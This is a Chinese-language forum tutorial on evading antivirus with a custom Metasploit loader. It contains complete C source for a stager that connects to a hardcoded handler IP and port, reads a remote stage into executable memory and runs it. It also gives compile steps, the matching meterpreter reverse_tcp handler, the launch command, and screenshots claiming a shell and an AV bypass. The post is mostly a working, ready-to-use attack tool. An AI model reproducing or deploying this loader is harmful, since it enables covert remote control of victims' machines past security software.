admin 发表于 2020-11-18 11:32:36

通过MSF加载器绕过AV

### 环境
* Dev C ++
* kali 2020
### 获取
![](data/attachment/forum/202011/18/032309vxnfmuuu7uumv7vm.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "QQ截图20201118091149.jpg")
新建一个 `Project` 命名为`Loader64` 并将文件另存为 `Loader64`。

将 Project 类型设置为 `C Project`，应用程序类型设置为 `Console Application`（即从命令行运行的程序）。
![](data/attachment/forum/202011/18/032553cqwtrwg78887aiaf.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "44.jpg")
### 粘贴下面代码
```
/*
* A C-based stager client compat with the Metasploit Framework
*    based on a discussion on the Metasploit Framework mailing list
*
* @author Raphael Mudge (raffi@strategiccyber.com)
* @license BSD License.
*
* Relevant messages:
* * http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
* * http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy */
#include <winsock2.h>   /* must come before windows.h, which otherwise pulls in the old winsock.h */
#include <windows.h>

/* init winsock */
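/* Initialise Winsock 2.2 or exit the process.
 *
 * WSAStartup() returns 0 on success or a positive WSA error code, so the
 * original "< 0" test could never fire and a failed init went unnoticed.
 * There is deliberately no WSACleanup() on the failure path: a failed
 * WSAStartup() leaves nothing to tear down. */
void winsock_init() {
        WSADATA wsaData;
        WORD    wVersionRequested = MAKEWORD(2, 2);
        int     err = WSAStartup(wVersionRequested, &wsaData);

        if (err != 0) {
                printf("WSAStartup failed (%d); ws2_32.dll may be out of date.\n", err);
                exit(1);
        }
}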

/* a quick routine to quit and report why we quit */
/* Fatal-error exit: print "Bad things: <error>", release the socket and
 * Winsock, then terminate with status 1. Never returns.
 *
 * my_socket may be INVALID_SOCKET (socket() failure path); the return value
 * of closesocket() is ignored either way. */
void punt(SOCKET my_socket, char * error) {
        fputs("Bad things: ", stdout);
        puts(error);                 /* puts() appends the trailing newline */

        closesocket(my_socket);
        WSACleanup();
        exit(1);
}

/* attempt to receive all of the requested data from the socket */
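/* Receive exactly len bytes from my_socket into buffer.
 *
 * Returns len on success. On any failure it calls punt() and therefore does
 * not return. Two fixes over the original loop:
 *   - recv() returning 0 means the peer closed the connection; the original
 *     treated it as progress and spun forever.
 *   - the error test now runs before the offsets are advanced, and the cursor
 *     is a char* (pointer arithmetic on void* is a GCC extension, not C). */
int recv_all(SOCKET my_socket, void * buffer, int len) {
        char * dst = (char *)buffer;
        int    got = 0;

        while (got < len) {
                int n = recv(my_socket, dst + got, len - got, 0);

                if (n == SOCKET_ERROR)
                        punt(my_socket, "Could not receive data");
                if (n == 0)
                        punt(my_socket, "Connection closed before all data arrived");

                got += n;
        }
        return got;
}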

/* establish a connection to a host:port */
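/* Open a TCP connection to targetip:port and return the connected SOCKET.
 *
 * targetip is a hostname or dotted IPv4 string resolved with gethostbyname();
 * port is a host-order TCP port. Every failure goes through punt(), so the
 * function only returns on success.
 *
 * The original memcpy'd h_length bytes into the 4-byte sin_addr without
 * checking the family or length; the address is now validated first, and
 * the sockaddr is zero-initialised so sin_zero is not left indeterminate. */
SOCKET wsconnect(char * targetip, int port) {
        struct hostent *   target;
        struct sockaddr_in sock = {0};
        SOCKET             my_socket;

        my_socket = socket(AF_INET, SOCK_STREAM, 0);
        if (my_socket == INVALID_SOCKET)
                punt(my_socket, "Could not initialize socket");

        target = gethostbyname(targetip);
        if (target == NULL)
                punt(my_socket, "Could not resolve target");

        /* only an AF_INET address of exactly sizeof(sin_addr) bytes fits the field */
        if (target->h_addrtype != AF_INET
            || target->h_length != (int)sizeof(sock.sin_addr)
            || target->h_addr == NULL)
                punt(my_socket, "Resolved address is not IPv4");

        memcpy(&sock.sin_addr, target->h_addr, sizeof(sock.sin_addr));
        sock.sin_family = AF_INET;
        sock.sin_port   = htons((unsigned short)port);

        if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) != 0)
                punt(my_socket, "Could not connect to target");

        return my_socket;
}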


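/* Stager entry point: connect to the handler, read a 4-byte length-prefixed
 * stage, prepend a "mov rdi, <socket>" stub, and jump into it.
 *
 * Usage: Loader64.exe <host> <port> -- both arguments are required by the
 * argc check but are currently unused; host and port are hard-coded in the
 * wsconnect() call below.
 *
 * Fixes over the posted listing (which the forum markup had mangled):
 *   - `buffer = 0x48; buffer = 0xBF;` overwrote the pointer itself and would
 *     crash on the memcpy; the intended `buffer[0]` / `buffer[1]` are restored.
 *   - printf("%s", argv) passed a char** to %s (undefined behaviour); argv[0].
 *   - the length is read with recv_all() so a short read cannot be accepted,
 *     and `size + 10` is computed in SIZE_T rather than 32-bit ULONG32.
 *   - the 10-byte stub only makes sense when SOCKET is 8 bytes (x64); that
 *     assumption is now checked instead of silently producing bad code. */
int main(int argc, char * argv[]) {
        ULONG32 size;
        unsigned char * buffer;
        void (*function)();

        winsock_init();

        if (argc != 3) {
                printf("%s \n", argv[0]);
                exit(1);
        }

        /* connect to the handler */
        SOCKET my_socket = wsconnect("192.168.123.33", 5555);

        /* read the 4-byte stage length; recv_all() punts on error or EOF */
        recv_all(my_socket, &size, 4);
        if (size == 0)
                punt(my_socket, "read a strange or incomplete length value\n");

        /* The stage executes out of this buffer, so it has to be executable.
           NOTE(review): a private RWX allocation is a well-known memory-scanner
           heuristic; a RW-then-VirtualProtect(PAGE_EXECUTE_READ) scheme would
           need confirming that the stage never writes into its own bytes. */
        buffer = VirtualAlloc(0, (SIZE_T)size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (buffer == NULL)
                punt(my_socket, "could not allocate buffer\n");

        /* 10-byte prologue handing the socket to the stage in rdi
           (per the original author's note, the stage expects it in edi/rdi):
              48 BF <imm64>  =>  mov rdi, <socket>
           The REX.W prefix and the 8-byte immediate are x64-only; a 32-bit
           build would need "BF <imm32>" with a 4-byte SOCKET instead. */
        if (sizeof(my_socket) != 8)
                punt(my_socket, "this loader only supports 64-bit builds\n");
        buffer[0] = 0x48;
        buffer[1] = 0xBF;
        memcpy(buffer + 2, &my_socket, 8);

        /* Pull the stage body in after the stub. The stage arrives over
           plaintext TCP with no integrity or origin check: whatever answers on
           that host:port gets executed in this process. */
        recv_all(my_socket, buffer + 10, size);

        /* cast our buffer as a function and call it */
        function = (void (*)())buffer;
        function();

        return 0;
}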
```
修改`SOCKET my_socket = wsconnect("192.168.123.33", 5555);`为你的IP和端口。
编译选项中添加`-lws2_32`
![](data/attachment/forum/202011/18/032858ecnuwzu69uu6muc9.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "66.jpg")
按 `F9` 编译，并在 msf 中监听。handler 的载荷要与这个加载器匹配：64 位、分阶段（staged）的 reverse_tcp 载荷（例如 `windows/x64/meterpreter/reverse_tcp`），因为加载器先读取 4 字节的 stage 长度，再把 socket 放进 rdi 后跳入 stage 执行。
在`cmd`中执行下面命令
```
Loader64.exe 192.168.123.33 5555
```
成功得到shell
![](data/attachment/forum/202011/18/033122x1zohbe1jo1obrso.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "QQ截图20201118113107.jpg")
### 免杀效果
![](data/attachment/forum/202011/18/033209ascs7qpqq7jpzjma.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "QQ截图20201118113156.jpg")